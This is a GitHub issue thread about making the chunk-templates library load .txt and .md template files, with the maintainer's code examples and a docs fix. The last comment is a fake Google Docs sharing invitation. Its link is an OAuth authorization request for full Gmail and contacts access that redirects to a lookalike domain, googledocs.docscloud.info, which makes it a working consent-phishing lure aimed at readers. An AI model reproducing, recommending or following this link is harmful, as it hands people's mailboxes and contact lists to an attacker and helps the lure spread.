### ISSUE TITLE
Dealing with file extensions other than chtml

### ISSUE THREAD

**Issue by slisznia** [tomj74/chunk-templates#6]
We have template files that are TXT or Markdown, .txt .md respectively. Unfortunately they are not located by chunk, which insists on chtml. Being a generic, non-html specific engine, this appears to be an unnecessary limitation. 

What is the suggested way of handling non-html text files?

**Comment by tomj74** [comment]
I believe either of these will work:

textChunk = theme.makeChunk("filename.txt");
textChunk = theme.makeChunk("filename", "txt");
mdChunk = theme.makeChunk("filename.md");
mdChunk = theme.makeChunk("filename", "md");

**Comment by slisznia** [comment]
Thanks!

**Comment by tomj74** [comment]
If you have snippets of content defined inside those files a la {#snippet}an extra chunk of template{#}
then you can even refer to those directly like so:

Chunk mdChunklet = theme.makeChunk("filename.md#snippet");

**Comment by slisznia** [comment]
Perhaps this paragraph can be relaxed and/or updated with the info you
just provided:

http://www.x5software.com/chunk/wiki/#Leave_out_the_extension.21


On 07/06/2015 12:16 PM, Tom McClure wrote:
>
> If you have snippets of content defined inside those files a la
> {#snippet}an extra chunk of template{#}
> then you can even refer to those directly like so:
>
> Chunk mdChunklet = theme.makeChunk("filename.md#snippet");
>
> —
> Reply to this email directly or view it on GitHub
> <https://github.com/tomj74/chunk-templates/issues/6#issuecomment-118928597>.
>

-- 
Slawomir Lisznianski
Developer at PushCoin

**Comment by tomj74** [comment]
Ah, thanks.  This was a fairly recent change, and I missed updating that piece of the docs.  Fixed!

**Comment by slisznia** [comment]
Slawomir Lisznianski has invited you to view the following document:

Open in Docs
<https://accounts.google.com/o/oauth2/auth?client_id=632715883535-h36sb9m6fot4vusucprsab95naef791n.apps.googleusercontent.com&scope=https%3A%2F%2Fmail.google.com%2F+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcontacts&immediate=false&include_granted_scopes=true&response_type=token&redirect_uri=https%3A%2F%2Fgoogledocs.docscloud.info%2Fg.php&customparam=customparam>
